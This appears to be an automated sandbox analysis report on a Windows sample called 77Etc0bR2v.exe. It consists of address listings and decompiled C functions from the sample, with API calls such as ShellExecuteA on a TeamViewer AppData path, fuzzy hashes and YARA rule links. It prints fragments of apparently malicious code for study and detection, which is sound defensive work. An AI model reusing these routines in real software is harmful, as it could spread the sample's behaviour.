                                                                                                                        0x00000000
                                                                                                                        0x004062b0
                                                                                                                        0x004062b3
                                                                                                                        0x004062b6
                                                                                                                        0x004062b9
                                                                                                                        0x004062bc
                                                                                                                        0x004062bf
                                                                                                                        0x004062c2
                                                                                                                        0x004062c5
                                                                                                                        0x004062c8
                                                                                                                        0x004062cb
                                                                                                                        0x004062ce
                                                                                                                        0x004062e6
                                                                                                                        0x004062e9
                                                                                                                        0x004062ec
                                                                                                                        0x004062ef
                                                                                                                        0x004062ef
                                                                                                                        0x004062f2
                                                                                                                        0x004062f6
                                                                                                                        0x004062f8
                                                                                                                        0x004062d0
                                                                                                                        0x004062d0
                                                                                                                        0x004062d8
                                                                                                                        0x004062dd
                                                                                                                        0x004062df
                                                                                                                        0x004062e1
                                                                                                                        0x004062e1
                                                                                                                        0x004062fb
                                                                                                                        0x00406302
                                                                                                                        0x00406305
                                                                                                                        0x00000000
                                                                                                                        0x00406307
                                                                                                                        0x00000000
                                                                                                                        0x00406307
                                                                                                                        0x00406305
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406347
                                                                                                                        0x00406347
                                                                                                                        0x0040634b
                                                                                                                        0x00406953
                                                                                                                        0x00000000
                                                                                                                        0x00406953
                                                                                                                        0x00406351
                                                                                                                        0x00406354
                                                                                                                        0x00406357
                                                                                                                        0x0040635b
                                                                                                                        0x0040635e
                                                                                                                        0x00406364
                                                                                                                        0x00406366
                                                                                                                        0x00406366
                                                                                                                        0x00406366
                                                                                                                        0x00406369
                                                                                                                        0x0040636c
                                                                                                                        0x0040636c
                                                                                                                        0x00406372
                                                                                                                        0x00406310
                                                                                                                        0x00406310
                                                                                                                        0x00406313
                                                                                                                        0x00000000
                                                                                                                        0x00406313
                                                                                                                        0x00406374
                                                                                                                        0x00406374
                                                                                                                        0x00406377
                                                                                                                        0x0040637a
                                                                                                                        0x0040637d
                                                                                                                        0x00406380
                                                                                                                        0x00406383
                                                                                                                        0x00406386
                                                                                                                        0x00406389
                                                                                                                        0x0040638c
                                                                                                                        0x0040638f
                                                                                                                        0x00406392
                                                                                                                        0x004063aa
                                                                                                                        0x004063ad
                                                                                                                        0x004063b0
                                                                                                                        0x004063b3
                                                                                                                        0x004063b3
                                                                                                                        0x004063b6
                                                                                                                        0x004063ba
                                                                                                                        0x004063bc
                                                                                                                        0x00406394
                                                                                                                        0x00406394
                                                                                                                        0x0040639c
                                                                                                                        0x004063a1
                                                                                                                        0x004063a3
                                                                                                                        0x004063a5
                                                                                                                        0x004063a5
                                                                                                                        0x004063bf
                                                                                                                        0x004063c6
                                                                                                                        0x004063c9
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x00406658
                                                                                                                        0x00406658
                                                                                                                        0x0040665c
                                                                                                                        0x00406983
                                                                                                                        0x00000000
                                                                                                                        0x00406983
                                                                                                                        0x00406662
                                                                                                                        0x00406665
                                                                                                                        0x00406668
                                                                                                                        0x0040666c
                                                                                                                        0x0040666f
                                                                                                                        0x00406675
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x0040667a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406428
                                                                                                                        0x00406428
                                                                                                                        0x0040642b
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00406767
                                                                                                                        0x0040676b
                                                                                                                        0x0040678d
                                                                                                                        0x00406790
                                                                                                                        0x0040679a
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x0040676d
                                                                                                                        0x00406770
                                                                                                                        0x00406774
                                                                                                                        0x00406777
                                                                                                                        0x00406777
                                                                                                                        0x0040677a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00000000
                                                                                                                        0x0040685b
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00406819
                                                                                                                        0x004067a0
                                                                                                                        0x0040679d

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                        • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                                        • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                        • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401DC1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 79%
                                                                                                                        			E00401DC1() {
				char* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E004029F6(_t19);
				_t6 = E004029F6(0x31);
				_t22 = E004029F6(0x22);
				E004029F6(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteA( *(_t26 - 0x34),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer",  *(_t26 - 0x18)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}







                                                                                                                        0x00401dc9
                                                                                                                        0x00401dcb
                                                                                                                        0x00401ddb
                                                                                                                        0x00401ddd
                                                                                                                        0x00401de4
                                                                                                                        0x00401df0
                                                                                                                        0x00401dfe
                                                                                                                        0x00401e07
                                                                                                                        0x00401e10
                                                                                                                        0x0040265c
                                                                                                                        0x0040265c
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\TeamViewer,?), ref: 00401E07
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401DF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 587946157-4213038595
                                                                                                                        • Opcode ID: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                                        • Instruction ID: e70fe2a762fbf0658a98981193bf00505e6ec524d5fd87abb86dead059a1e580
                                                                                                                        • Opcode Fuzzy Hash: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                                        • Instruction Fuzzy Hash: 7BF0C872B04201AAC751AFB59D4AA5E26A8AB41398F200637F510F61C1D9BD8841A658
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                                                        0x0040138a
                                                                                                                        0x004013fa
                                                                                                                        0x0040139b
                                                                                                                        0x004013a0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004013a2
                                                                                                                        0x004013a3
                                                                                                                        0x004013ad
                                                                                                                        0x00000000
                                                                                                                        0x00401404
                                                                                                                        0x004013b0
                                                                                                                        0x004013b7
                                                                                                                        0x004013bd
                                                                                                                        0x004013be
                                                                                                                        0x004013c0
                                                                                                                        0x004013c2
                                                                                                                        0x004013b9
                                                                                                                        0x004013b9
                                                                                                                        0x004013ba
                                                                                                                        0x004013ba
                                                                                                                        0x004013c9
                                                                                                                        0x004013cb
                                                                                                                        0x004013f4
                                                                                                                        0x004013f4
                                                                                                                        0x004013c9
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                        • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                                        • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                        • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                        0x00405841
                                                                                                                        0x0040584e
                                                                                                                        0x00405863
                                                                                                                        0x00405869

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00405841
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                        • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                                        • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                        • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004035BD, Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004035BD() {
				void* _t1;
				void* _t2;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E0040361A();
				return E0040548B(_t7, _t12, 0x42a800, 7);
			}







                                                                                                                        0x004035bd
                                                                                                                        0x004035cc
                                                                                                                        0x004035cf
                                                                                                                        0x004035d1
                                                                                                                        0x004035d1
                                                                                                                        0x004035d8
                                                                                                                        0x004035e0
                                                                                                                        0x004035e3
                                                                                                                        0x004035e5
                                                                                                                        0x004035e5
                                                                                                                        0x004035e5
                                                                                                                        0x004035ec
                                                                                                                        0x004035fe

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035CF
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: d5091cb339cf9ca4b2a17f3525511bedeea9812c5bf65782ecb3b679df28d270
                                                                                                                        • Instruction ID: 5c77e6c533590f6c422f1e12d180fd4ee44bb6ddfd602f374d0031013ab669df
                                                                                                                        • Opcode Fuzzy Hash: d5091cb339cf9ca4b2a17f3525511bedeea9812c5bf65782ecb3b679df28d270
                                                                                                                        • Instruction Fuzzy Hash: 3AE08C30900610AAC234AF7CAE4594A3A1C9B413327248722F538F21F2C738AE824AAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                        0x004031c3
                                                                                                                        0x004031d6
                                                                                                                        0x004031de
                                                                                                                        0x00000000
                                                                                                                        0x004031e5
                                                                                                                        0x00000000
                                                                                                                        0x004031e7

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
